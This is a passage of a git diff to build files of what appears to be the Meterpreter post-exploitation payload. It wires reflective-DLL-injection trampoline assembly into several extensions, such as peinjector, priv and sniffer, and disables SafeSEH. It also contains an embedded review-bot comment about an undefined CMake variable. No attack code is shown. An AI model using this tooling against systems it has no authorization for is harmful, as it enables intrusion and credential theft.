 <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
@@ -402,6 +407,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName)
 <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <ProgramDatabaseFile />
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <PostBuildEvent>
 <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
@@ -420,6 +426,18 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 <ClInclude Include="..\..\source\extensions\lanattacks\TFTPserv.h" />
 <ClInclude Include="..\..\source\extensions\lanattacks\lanattacks.h" />
 </ItemGroup>
+ <ItemGroup>
+ <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline32.asm">
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild>
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'">true</ExcludedFromBuild>
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild>
+ </MASM>
+ <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline64.asm">
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild>
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'">true</ExcludedFromBuild>
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild>
+ </MASM>
+ </ItemGroup>
 <Choose>
 <When Condition="'$(Platform)'=='Win32'" />
 </Choose>
@@ -427,4 +445,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 <ImportGroup Label="ExtensionTargets">
 <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
 </ImportGroup>
-</Project>
+</Project>
\ No newline at end of file
diff --git a/c/meterpreter/workspace/ext_server_peinjector/CMakeLists.txt b/c/meterpreter/workspace/ext_server_peinjector/CMakeLists.txt index aaa662ae0..69343e417 100644 --- a/c/meterpreter/workspace/ext_server_peinjector/CMakeLists.txt +++ b/c/meterpreter/workspace/ext_server_peinjector/CMakeLists.txt @@ -29,7 +29,7 @@ if(MSVC) set_source_files_properties(${MOD_DEF_DIR}/extension.def PROPERTIES HEADER_FILE_ONLY TRUE) endif() -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() diff --git a/c/meterpreter/workspace/ext_server_peinjector/ext_server_peinjector.vcxproj b/c/meterpreter/workspace/ext_server_peinjector/ext_server_peinjector.vcxproj index a8a5ce5d1..137fcc1c4 100755 --- a/c/meterpreter/workspace/ext_server_peinjector/ext_server_peinjector.vcxproj +++ b/c/meterpreter/workspace/ext_server_peinjector/ext_server_peinjector.vcxproj @@ -152,6 +152,7 @@ <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -207,6 +208,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile> </ProgramDatabaseFile> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL 
@@ -261,6 +263,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName)
 <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <ProgramDatabaseFile />
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <PostBuildEvent>
 <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
@@ -316,6 +319,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <ProgramDatabaseFile />
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <PostBuildEvent>
 <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
@@ -372,6 +376,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <ProgramDatabaseFile>
 </ProgramDatabaseFile>
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <PostBuildEvent>
 <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
@@ -427,6 +432,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName)
 <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <ProgramDatabaseFile />
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <PostBuildEvent>
 <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
@@ -452,6 +458,18 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 <ClInclude Include="..\..\source\extensions\peinjector\peinjector.h" />
 <ClInclude Include="..\..\source\extensions\peinjector\peinjector_bridge.h" />
 </ItemGroup>
+ <ItemGroup>
+ <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline32.asm">
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild>
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'">true</ExcludedFromBuild>
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild>
+ </MASM>
+ <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline64.asm">
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild>
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'">true</ExcludedFromBuild>
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild>
+ </MASM>
+ </ItemGroup>
 <Choose>
 <When Condition="'$(Platform)'=='Win32'" />
 </Choose>
@@ -459,4 +477,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 <ImportGroup Label="ExtensionTargets">
 <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
 </ImportGroup>
-</Project>
+</Project>
\ No newline at end of file
diff --git a/c/meterpreter/workspace/ext_server_powershell/CMakeLists.txt b/c/meterpreter/workspace/ext_server_powershell/CMakeLists.txt
index 2112b8f0b..6753f1b78 100644
--- a/c/meterpreter/workspace/ext_server_powershell/CMakeLists.txt
+++ b/c/meterpreter/workspace/ext_server_powershell/CMakeLists.txt
@@ -25,7 +25,7 @@ set_target_properties(${PROJECT_NAME} PROPERTIES LINK_FLAGS "/DEF:\"${MOD_DEF_DI set_source_files_properties(${MOD_DEF_DIR}/extension.def PROPERTIES HEADER_FILE_ONLY TRUE) set(LINK_LIBS psapi ws2_32) -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() diff --git a/c/meterpreter/workspace/ext_server_powershell/ext_server_powershell.vcxproj b/c/meterpreter/workspace/ext_server_powershell/ext_server_powershell.vcxproj index 3e86f8957..3a7e798f7 100644 --- a/c/meterpreter/workspace/ext_server_powershell/ext_server_powershell.vcxproj +++ b/c/meterpreter/workspace/ext_server_powershell/ext_server_powershell.vcxproj @@ -153,6 +153,7 @@ <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -209,6 +210,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile> </ProgramDatabaseFile> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL 
@@ -264,6 +266,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName)
 <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <ProgramDatabaseFile />
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <PostBuildEvent>
 <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
@@ -320,6 +323,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <ProgramDatabaseFile />
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <PostBuildEvent>
 <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
@@ -377,6 +381,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <ProgramDatabaseFile>
 </ProgramDatabaseFile>
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <PostBuildEvent>
 <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
@@ -433,6 +438,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName)
 <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <ProgramDatabaseFile />
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <PostBuildEvent>
 <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
@@ -453,6 +459,18 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 <ClInclude Include="..\..\source\extensions\powershell\powershell_bridge.h" />
 <ClInclude Include="..\..\source\extensions\powershell\powershell_runner.h" />
 </ItemGroup>
+ <ItemGroup>
+ <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline32.asm">
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild>
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'">true</ExcludedFromBuild>
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild>
+ </MASM>
+ <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline64.asm">
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild>
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'">true</ExcludedFromBuild>
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild>
+ </MASM>
+ </ItemGroup>
 <Choose>
 <When Condition="'$(Platform)'=='Win32'" />
 </Choose>
@@ -460,4 +478,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 <ImportGroup Label="ExtensionTargets">
 <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
 </ImportGroup>
-</Project>
+</Project>
\ No newline at end of file
diff --git a/c/meterpreter/workspace/ext_server_priv/CMakeLists.txt b/c/meterpreter/workspace/ext_server_priv/CMakeLists.txt
index ab27c4516..da2fa9266 100644
--- a/c/meterpreter/workspace/ext_server_priv/CMakeLists.txt
+++ b/c/meterpreter/workspace/ext_server_priv/CMakeLists.txt
@@ -42,6 +42,10 @@ else() '-D__success=DISCARD' '-D__FUNCTION__=""' '-D__struct_bcount=DISCARD' + '-D__nullterminated=SAL__nullterminated' + '-D__in_range=__RPC__in_range' + '-D__callback=SAL__callback' + '-D__deref_in_bcount_opt=SAL__deref_in_bcount_opt' ) endif() @@ -68,7 +72,7 @@ if(MSVC) endif() set(LINK_LIBS psapi rpcrt4) -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() diff --git a/c/meterpreter/workspace/ext_server_priv/ext_server_priv.vcxproj b/c/meterpreter/workspace/ext_server_priv/ext_server_priv.vcxproj index f7d4d1a84..d005b53bb 100644 --- a/c/meterpreter/workspace/ext_server_priv/ext_server_priv.vcxproj +++ b/c/meterpreter/workspace/ext_server_priv/ext_server_priv.vcxproj @@ -170,6 +170,7 @@ <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <GenerateDebugInformation>false</GenerateDebugInformation> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <Bscmake> <SuppressStartupBanner>true</SuppressStartupBanner> @@ -243,6 +244,7 @@ msbuild.exe /target:Build /property:PlatformToolset=$(PlatformToolset);Configura <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <GenerateDebugInformation>false</GenerateDebugInformation> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <Bscmake> <SuppressStartupBanner>true</SuppressStartupBanner> 
@@ -316,6 +318,7 @@ msbuild.exe /target:Build /property:PlatformToolset=$(PlatformToolset);Configura
 <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <GenerateDebugInformation>false</GenerateDebugInformation>
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <Bscmake>
 <SuppressStartupBanner>true</SuppressStartupBanner>
@@ -389,6 +392,7 @@ msbuild.exe /target:Build /property:PlatformToolset=$(PlatformToolset);Configura
 <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <GenerateDebugInformation>false</GenerateDebugInformation>
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <Bscmake>
 <SuppressStartupBanner>true</SuppressStartupBanner>
@@ -461,6 +465,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <GenerateDebugInformation>false</GenerateDebugInformation>
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <Bscmake>
 <SuppressStartupBanner>true</SuppressStartupBanner>
@@ -533,6 +538,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName)
 <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <GenerateDebugInformation>false</GenerateDebugInformation>
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <Bscmake>
 <SuppressStartupBanner>true</SuppressStartupBanner>
@@ -603,8 +609,20 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <None Include="..\..\output\dump_sam.x64.dll" /> <None Include="..\..\output\dump_sam.x86.dll" /> </ItemGroup> + <ItemGroup> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline32.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + </MASM> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline64.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + </MASM> + </ItemGroup> <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> <ImportGroup Label="ExtensionTargets"> <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" /> </ImportGroup> -</Project> +</Project> \ No newline at end of file diff --git a/c/meterpreter/workspace/ext_server_python/CMakeLists.txt b/c/meterpreter/workspace/ext_server_python/CMakeLists.txt index ed6f16b36..8a6de2107 100644 --- a/c/meterpreter/workspace/ext_server_python/CMakeLists.txt +++ b/c/meterpreter/workspace/ext_server_python/CMakeLists.txt @@ -55,7 +55,7 @@ set(LINK_LIBS ${LIBRESSL_LIB_DIR}/tls-20.lib ) -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() 
diff --git a/c/meterpreter/workspace/ext_server_python/ext_server_python.vcxproj b/c/meterpreter/workspace/ext_server_python/ext_server_python.vcxproj
index 6929a8b7c..a29adbdd6 100755
--- a/c/meterpreter/workspace/ext_server_python/ext_server_python.vcxproj
+++ b/c/meterpreter/workspace/ext_server_python/ext_server_python.vcxproj
@@ -152,6 +152,7 @@
 <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <ProgramDatabaseFile />
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <PostBuildEvent>
 <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
@@ -210,6 +211,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <ProgramDatabaseFile>
 </ProgramDatabaseFile>
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <PostBuildEvent>
 <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
@@ -267,6 +269,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName)
 <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <ProgramDatabaseFile />
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <PostBuildEvent>
 <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
@@ -324,6 +327,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <ProgramDatabaseFile />
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <PostBuildEvent>
 <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
@@ -382,6 +386,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <ProgramDatabaseFile>
 </ProgramDatabaseFile>
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <PostBuildEvent>
 <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
@@ -439,6 +444,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName)
 <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <ProgramDatabaseFile />
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <PostBuildEvent>
 <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
@@ -811,9 +817,19 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild>
 <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'">true</ExcludedFromBuild>
 </MASM>
+ <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline32.asm">
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild>
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'">true</ExcludedFromBuild>
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild>
+ </MASM>
+ <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline64.asm">
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild>
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'">true</ExcludedFromBuild>
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild>
+ </MASM>
 </ItemGroup>
 <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
 <ImportGroup Label="ExtensionTargets">
 <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
 </ImportGroup>
-</Project>
+</Project>
\ No newline at end of file
diff --git a/c/meterpreter/workspace/ext_server_python/ext_server_python.vcxproj.filters b/c/meterpreter/workspace/ext_server_python/ext_server_python.vcxproj.filters
index e9ab9a205..ab90e5c43 100755
--- a/c/meterpreter/workspace/ext_server_python/ext_server_python.vcxproj.filters
+++ b/c/meterpreter/workspace/ext_server_python/ext_server_python.vcxproj.filters
@@ -1043,6 +1043,7 @@
 <ClCompile Include="..\..\source\extensions\python\Modules\getbuildinfo.c">
 <Filter>Modules</Filter>
 </ClCompile>
+ <ClCompile Include="..\..\source\logging\logging.c" />
 </ItemGroup>
 <ItemGroup>
 <ResourceCompile Include="..\..\source\extensions\python\Resource Files\python_core.rc">
@@ -1058,5 +1059,7 @@
 <MASM Include="..\..\source\extensions\python\Modules\_ctypes\libffi_msvc\win64.asm">
 <Filter>Modules\_ctypes</Filter>
 </MASM>
+ <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline64.asm" />
+ <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline32.asm" />
 </ItemGroup>
 </Project>
\ No newline at end of file
diff --git a/c/meterpreter/workspace/ext_server_sniffer/CMakeLists.txt b/c/meterpreter/workspace/ext_server_sniffer/CMakeLists.txt
index 366cf1039..6f4408066 100644
--- a/c/meterpreter/workspace/ext_server_sniffer/CMakeLists.txt
+++ b/c/meterpreter/workspace/ext_server_sniffer/CMakeLists.txt
@@ -38,7 +38,7 @@ if(IS_X64)
 endif()
 set(LINK_LIBS ${PSSDK_LIB_DIR}/pssdk_vc${PSSDK_VER}_mt.lib ws2_32)
-target_link_libraries(${PROJECT_NAME} ${LINK_LIBS})
+target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM})
 if(MSVC)
 target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070")
 endif()
diff --git a/c/meterpreter/workspace/ext_server_sniffer/ext_server_sniffer.vcxproj b/c/meterpreter/workspace/ext_server_sniffer/ext_server_sniffer.vcxproj
index 8473e05af..9993531bf 100644
--- a/c/meterpreter/workspace/ext_server_sniffer/ext_server_sniffer.vcxproj
+++ b/c/meterpreter/workspace/ext_server_sniffer/ext_server_sniffer.vcxproj
@@ -140,6 +140,7 @@
 <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <GenerateDebugInformation>false</GenerateDebugInformation>
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <Bscmake>
 <SuppressStartupBanner>true</SuppressStartupBanner>
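Review bot: `${MET_RDI_ASM}` is appended to target_link_libraries in the ext_server_sniffer CMakeLists.txt hunk but is not defined anywhere in this file, so if the top-level CMake does not set it the variable expands to nothing and the link silently proceeds without the GateTrampoline objects, showing up only as unresolved symbols at link time or, if they resolve some other way, as a different binary than MSBuild produces. A guard at the point of use, `if(NOT DEFINED MET_RDI_ASM)` / `message(FATAL_ERROR "MET_RDI_ASM is not set")` / `endif()`, or an equivalent check where the variable is presumably defined, makes the new dependency explicit. The same one-line change is made in the CMakeLists.txt of ext_server_stdapi, ext_server_unhook, ext_server_winpmem, metsrv and screenshot in the hunks that follow.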
@@ -207,6 +208,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <GenerateDebugInformation>false</GenerateDebugInformation>
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <Bscmake>
 <SuppressStartupBanner>true</SuppressStartupBanner>
@@ -273,6 +275,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName)
